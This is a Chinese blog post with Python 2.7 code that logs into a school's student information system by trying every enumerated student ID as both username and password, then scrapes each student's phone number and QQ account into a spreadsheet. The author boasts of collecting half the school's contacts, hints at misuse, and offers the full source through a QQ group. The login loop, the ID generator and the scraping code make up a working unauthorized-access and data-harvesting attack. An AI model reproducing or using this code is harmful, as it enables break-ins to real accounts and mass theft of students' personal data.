当前位置：移动技术网 > IT编程>脚本编程>Python > 爬虫实在是太好玩了！看我是如何获取整个学校的学生call和qq！

爬虫实在是太好玩了！看我是如何获取整个学校的学生call和qq！

2018年06月09日 | 移动技术网IT编程 | 我要评论

20121115新闻联播,高城梨沙,湖北球迷论坛

爬虫开始前的准备：

python2.7
库文件（xlwt，urllib2，BeautifulSoup4，xlrd）

安装库文件的方法：

最好在你的python2.7/script/下面打开power shell(可以shift+右击) 执行下面的：

安装库文件：

pip install *** ***是指上面的库文件，下面不一定都用，只要上面的，以后出什么错，你就继续pip install

如何查看自己已经安装了的库

pip list

观察网站结构（密码规则）：

密码规则

首先这个规则是针对大二和已经毕业了的
密码规则没有添加验证码（其实添加验证码也没什么用，只是添加了爬取门槛）
规则是用户名==密码
符合条件

user_info

这里的用户信息
不要在意这些细节（马赛克）朦胧美一直是我的追求

sys.setdefaultencoding("utf-8")
# ssl这个是验证证书 https
ssl._create_default_https_context = ssl._create_unverified_context
# 生成一个存储cookie的对象
c = cookielib.LWPCookieJar()
cookie = urllib2.HTTPCookieProcessor(c)
opener = urllib2.build_opener(cookie)
urllib2.install_opener(opener)

学号的列表

不要在意我是怎么知道的，

重要的是这些规则，你怎么去重新写一个函数代入

（里面的我修改过，所以不要套用，以免浪费时间）

# 学号只在最后3位不一样，随机数xrange（） 可以处理更好的处理大的列表
def user_id():
 list_1 = []
 for i in xrange(101,249):
 list_1.append('1131050'+str(i))
 for i in xrange(301,349):
 list_1.append('1131050'+ str(i))
 for i in xrange(401,448):
 list_1.append('1131050'+ str(i))
 for i in xrange(501,548):
 list_1.append('1131050'+ str(i))
 for i in xrange(101,150):
 list_1.append('1131070'+ str(i))
 for i in xrange(101,151):
 list_1.append('1131050'+ str(i))
 for i in xrange(201,252):
 list_1.append('1135050'+ str(i))
 for i in xrange(301,352):
 list_1.append('1131050'+ str(i))
 for i in xrange(401,453):
 list_1.append('1131050'+ str(i))
 for i in xrange(101,148):
 list_1.append('1131070'+ str(i))
 for i in xrange(201,247):
 list_1.append('1131070'+ str(i))
 return list_1

用户信息的获取

这里用的的是beautifulsoup库

def user_info():
 url_info="http://XXX.xxxx.edu.cn:80/Modile/Sys/Meddage/Info.aspx"
 html2 = opener.open(url_info).read()
 
 # python2.7 没装lxml的可能会报错，pip install lxml
 
 soup = BeautifulSoup(html2,"lxml") #以lxml 方式解析抓下来的lxml
 infos = soup.select("tr > td > span") # css seletor 来获取指定标签
 #print profes
 # print infos
 return infos

写入xls(这个是思路)测试用的函数

因为在写的时候因为编码问题，不能写入中文

def write_user():
 file2 = xlwt.Workbook(encoding='utf-8') #打开一个excel,并且编码格式以 'utf-8'
 table = file2.add_sheet('info',cell_overwrite_ok=True) #添加一个表
 table.write(0,0,"15d中文3s0") # 写入内容，table.write(row,col,'value')
 file2.save('file2.xls')

开始行动：
添加上延迟访问： time.sleep(1)

因为爬虫访问的不和人一样，访问会很快，
这样可以避免被封ip 还有避免给站点带来不好的影响

def go_user():
 user_list = []
 user_infos = []
 user_list = user_id()
 file2 = xlwt.Workbook(encoding='utf-8')
 table = file2.add_sheet('info',cell_overwrite_ok=True)
 r = 0 #row 行
 for i in user_list:
 c = 0 #col
 login(username=i, password=i) #登录，并传入列表的学号
 user_infos = user_info() #获取学号信息，格式是字典
 for i in user_infos[0:10]: #写入表单中，循环把信息写进去
 # print i.get_text()
 table.write(r,c,i.get_text())
 c += 1
 r += 1
 time.sleep(1) #延迟访问，可避免封ip，还有影响服务器
 print r,c
 file2.save('file2.xls')

程序执行结束：

部分截图：有图有真相，避免无知的喷子

学号规则很好找的，这样就获取半个学校的call和qq啦，至于能干嘛，自己脑补。。。

end_info

不知道库的使用方法，我这里总结了下，还有不知道的只能百度啦

是不是很强势？有没有很装逼？哈哈哈！

进群：125240963 即可获取源码！

您可能感兴趣的文章:

如对本文有疑问，请在下面进行留言讨论，广大热心网友会与你互动！！点击进行留言回复

新手学习Python2和Python3中print不同的用法

在python2和python3中都提供print()方法来打印信息,但两个版本间的print稍微有差异主要体现在以下几个方面：1.python3中print是... [阅读全文]
Python基于os.environ从windows获取环境变量

安装python之后，我们往往面临这样一个问题，在命令行输入“python”，竟然出错，难道是没有安装成功吗？非也，其实是你的系统环境变量没有设置好。今天，小编... [阅读全文]
keras实现调用自己训练的模型,并去掉全连接层

其实很简单from keras.models import load_modelbase_model = load_model('model_resenet.h... [阅读全文]
python中def是做什么的

python使用def开始函数定义，紧接着是函数名，括号内部为函数的参数，内部为函数的具体功能实现代码，如果想要函数有返回值, 在expressions中的逻... [阅读全文]
Python xlwt模块使用代码实例

简介写入excle文档安装：pip3 install xlwt导入：import xlwtxlrd 模块方法写入案例import xlwt# 创建对象，设置编码... [阅读全文]
Keras之自定义损失(loss)函数用法说明

在keras中可以自定义损失函数，在自定义损失函数的过程中需要注意的一点是，损失函数的参数形式，这一点在keras中是固定的，须如下形式：def my_loss... [阅读全文]
Python xlrd模块导入过程及常用操作

简介读取excle文档，支持xls，xlsx格式安装：pip3 install xlrd导入：import xlrdxlrd 模块方法读取excelfile =... [阅读全文]
keras打印loss对权重的导数方式

notes怀疑模型梯度爆炸，想打印模型 loss 对各权重的导数看看。如果如果fit来训练的话，可以用keras.callbacks.tensorboard实现... [阅读全文]
keras 使用Lambda 快速新建层添加多个参数操作

keras许多简单操作，都需要新建一个层，使用lambda可以很好完成需求。# 额外参数def normal_reshape(x, shape): return... [阅读全文]
JAVA及PYTHON质数计算代码对比解析

java 实现class primenumber{public static void main(string[] args) {long start=syst... [阅读全文]

网友评论


验证码：

爬虫实在是太好玩了！看我是如何获取整个学校的学生call和qq！

2018年06月09日 | 移动技术网IT编程 | 我要评论

您可能感兴趣的文章:

相关文章:

网友评论